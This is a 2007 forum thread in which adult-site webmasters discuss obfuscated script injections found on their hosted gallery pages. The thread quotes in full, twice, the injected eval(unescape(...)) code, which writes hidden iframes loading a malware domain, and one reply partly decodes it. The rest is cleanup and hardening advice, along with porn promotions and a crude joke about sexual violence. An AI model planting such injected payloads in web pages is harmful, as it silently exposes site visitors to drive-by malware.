so those viruses on my tgp is back... any one else?

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • tehHinjew
    Confirmed User
    • Sep 2006
    • 5755

    #1

    so those viruses on my tgp is back... any one else?

    <script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e %77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%7 2%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79% 64%65%6c%65%74%65%2e%63%6f%6d%2f%73%74%72%6f%6e%67 %2f%30%35%30%2f%20%77%69%64%74%68%3d%31%20%68%65%6 9%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27% 29%3b'));</script>
    <script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e %77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%7 2%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79% 64%65%6c%65%74%65%2e%63%6f%6d%2f%64%6c%2f%6e%65%77 %6e%65%77%2e%70%68%70%3f%61%64%76%3d%35%30%20%77%6 9%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c% 2f%69%66%72%61%6d%65%3e%27%29%3b'));</script>

    hosted at webair, i have 0 scripts

    any one else?

    Hot Porn Wanna trade? email me at wanker (@) wanknation dot com
  • tehHinjew
    Confirmed User
    • Sep 2006
    • 5755

    #2
    http://www.google.ca/search?source=i...e+Search&meta=

    Hot Porn Wanna trade? email me at wanker (@) wanknation dot com

    Comment

    • justFred
      Confirmed User
      • Mar 2007
      • 922

      #3
      Vote Bill Cosby 2012

      Comment

      • MoreMagic
        Confirmed User
        • Feb 2006
        • 2851

        #4
        Let me guess cpanel?

        Comment

        • SmokeyTheBear
          ►SouthOfHeaven
          • Jun 2004
          • 28609

          #5
          Originally posted by MoreMagic
          Let me guess cpanel?
          i doubt it , webair doesnt use cpanel by default i don't think
          hatisblack at yahoo.com

          Comment

          • starpimps
            Confirmed User
            • Sep 2006
            • 6954

            #6
            thanks for the heads up...checked some sites
            and i got the same code

            files modified on nov19th =\
            Last edited by starpimps; 11-24-2007, 11:16 PM.
            Teen Porn Models / Solo Girls

            Comment

            • hjnet
              Confirmed User
              • May 2002
              • 3815

              #7
              Your server got hacked, a good idea would be to check your sites files for recently changed or newly added files, you can alos do that through FTP.

              And through SSH you could take a look what recently happend on your server with the "last" command.

              Oh and update your box

              Comment

              • V_RocKs
                Damn Right I Kiss Ass!
                • Nov 2003
                • 32451

                #8
                Webair has problems....

                Comment

                • Zester
                  Confirmed User
                  • Jul 2003
                  • 5344

                  #9
                  use this encoder/decoder:
                  http://d21c.com/sookietex/ASCII2HEX.html
                  * Mainstream ? $65 per sale
                  * new male contraception

                  Comment

                  • Zester
                    Confirmed User
                    • Jul 2003
                    • 5344

                    #10
                    here is is decoded:
                    PHP Code:
                    document. write('<iframe s%7 2c=http://softspy% 64elete.com/strong /050/ width=1 he%6 9ght=1></iframe>'); 
                    
                    I fucked it up a little but you get the picture...
                    * Mainstream ? $65 per sale
                    * new male contraception

                    Comment

                    • Pornopat
                      AdultTubeSubmits.com
                      • Dec 2003
                      • 10598

                      #11
                      Delete all php files from your server and then start cleaning up the mess with a code that represses.
                      https://stripcash.com/sign-up/?userI...fff832eb95ab6a

                      Comment

                      • Spudman
                        Confirmed User
                        • Aug 2002
                        • 3198

                        #12
                        i had this problem, got rid of it recently and im still ok at the moment, im with webair too.
                        Take it Easy !!!

                        Comment

                        • Scootermuze
                          Confirmed User
                          • Dec 2001
                          • 4513

                          #13
                          I get them on ocassion...

                          I've cleaned up, changed passwords, removed all php, and still have them show up now and then...

                          The php I did use were just single file parser scripts..

                          Anyone know of a way to restrict ftp access to a given ip address?

                          Comment

                          • directfiesta
                            Too lazy to set a custom title
                            • Oct 2002
                            • 30184

                            #14
                            Originally posted by Scootermuze

                            Anyone know of a way to restrict ftp access to a given ip address?
                            firewall
                            I know that Asspimple is stoopid ... As he says, it is a FACT !

                            But I can't figure out how he can breathe or type , at the same time ....

                            Comment

                            • directfiesta
                              Too lazy to set a custom title
                              • Oct 2002
                              • 30184

                              #15
                              Originally posted by MoreMagic
                              Let me guess cpanel?
                              wrong ...... another guess?
                              I know that Asspimple is stoopid ... As he says, it is a FACT !

                              But I can't figure out how he can breathe or type , at the same time ....

                              Comment

                              • Zester
                                Confirmed User
                                • Jul 2003
                                • 5344

                                #16
                                what do you guys mean "remove all php files" ? how it this related to php?
                                * Mainstream ? $65 per sale
                                * new male contraception

                                Comment

                                • Evil E
                                  Confirmed User
                                  • Apr 2005
                                  • 3201

                                  #17
                                  Are you on a dedicated box?


                                  A girl once told me "Give me 8 inches and make it HURT".

                                  So, I fucked her twice and hit her with a brick.

                                  Comment

                                  • Evil E
                                    Confirmed User
                                    • Apr 2005
                                    • 3201

                                    #18
                                    http://64.233.167.104/search?q=cache...nk&cd=10&gl=ca


                                    A girl once told me "Give me 8 inches and make it HURT".

                                    So, I fucked her twice and hit her with a brick.

                                    Comment

                                    • Evil E
                                      Confirmed User
                                      • Apr 2005
                                      • 3201

                                      #19
                                      I hope webair are looking into this problem with you, because there might be some weird/illegal activities going onright now...

                                      http://www.honeynet.org.cn/downloads...etworks_EC.htm
                                      Last edited by Evil E; 11-25-2007, 07:02 AM.


                                      A girl once told me "Give me 8 inches and make it HURT".

                                      So, I fucked her twice and hit her with a brick.

                                      Comment

                                      • hjnet
                                        Confirmed User
                                        • May 2002
                                        • 3815

                                        #20
                                        Originally posted by Scootermuze
                                        I get them on ocassion...

                                        I've cleaned up, changed passwords, removed all php, and still have them show up now and then...

                                        The php I did use were just single file parser scripts..

                                        Anyone know of a way to restrict ftp access to a given ip address?
                                        I'd guess the person who did it used a proxy, but search google for "IPTables" or "hosts.deny"

                                        Comment

                                        • Zester
                                          Confirmed User
                                          • Jul 2003
                                          • 5344

                                          #21
                                          bbbbbbbump
                                          * Mainstream ? $65 per sale
                                          * new male contraception

                                          Comment

                                          • Sosa
                                            In Tushy Land
                                            • Oct 2002
                                            • 40149

                                            #22
                                            that sucks for you

                                            Comment

                                            • 'So Fucking Money
                                              Confirmed User
                                              • Aug 2004
                                              • 694

                                              #23
                                              Yeah, webair has been beginning to suck. Who is the webair replacement?
                                              The Print Foundry Co. - Design & Print Shop - ICQ: 371115529

                                              Comment

                                              • Adultnet
                                                Confirmed User
                                                • Sep 2003
                                                • 8713

                                                #24
                                                yeah not good.. good luck with resolving this...


                                                TrafficCashGold Paying Webmasters Since 1996!

                                                Awesome Conversions! Fast Weekly Payments! Over 125 Tours!

                                                Comment

                                                • sortie
                                                  Confirmed User
                                                  • Mar 2007
                                                  • 7771

                                                  #25
                                                  Originally posted by tehHinjew
                                                  <script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e %77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%7 2%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79% 64%65%6c%65%74%65%2e%63%6f%6d%2f%73%74%72%6f%6e%67 %2f%30%35%30%2f%20%77%69%64%74%68%3d%31%20%68%65%6 9%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27% 29%3b'));</script>
                                                  <script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e %77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%7 2%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79% 64%65%6c%65%74%65%2e%63%6f%6d%2f%64%6c%2f%6e%65%77 %6e%65%77%2e%70%68%70%3f%61%64%76%3d%35%30%20%77%6 9%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c% 2f%69%66%72%61%6d%65%3e%27%29%3b'));</script>

                                                  hosted at webair, i have 0 scripts

                                                  any one else?
                                                  You should ask them if they have the lastest version of SSH installed on their servers. There is a version of SSH that could be flooded and allow a hacker to login to the server. This was fixed, but if a web host is still using the old version then the problem is there.

                                                  Comment

                                                  • Wiredoctor
                                                    Confirmed User
                                                    • Dec 2001
                                                    • 1632

                                                    #26
                                                    Once your server get compromised like this the only 100% fail safe way to get it back is to format it, and make sure your host knows how to firewall it this time. This should never or very rarely happen if the server is being managed properly.
                                                    Search For Everything In One Easy Portal
                                                    Big Juicy Nipples.com

                                                    Comment

                                                    • Evil E
                                                      Confirmed User
                                                      • Apr 2005
                                                      • 3201

                                                      #27
                                                      If still not fixed, you have to check which scripts you run on your server and if any of those scripts versions are vulnerable to known exploits.


                                                      A girl once told me "Give me 8 inches and make it HURT".

                                                      So, I fucked her twice and hit her with a brick.

                                                      Comment

                                                      • The Judge
                                                        Confirmed User
                                                        • Jan 2006
                                                        • 1647

                                                        #28
                                                        But does your antivirus detect it when you load your page? If not then it is something way more evil (undetectable Russian rootkit)

                                                        Comment

                                                        Working...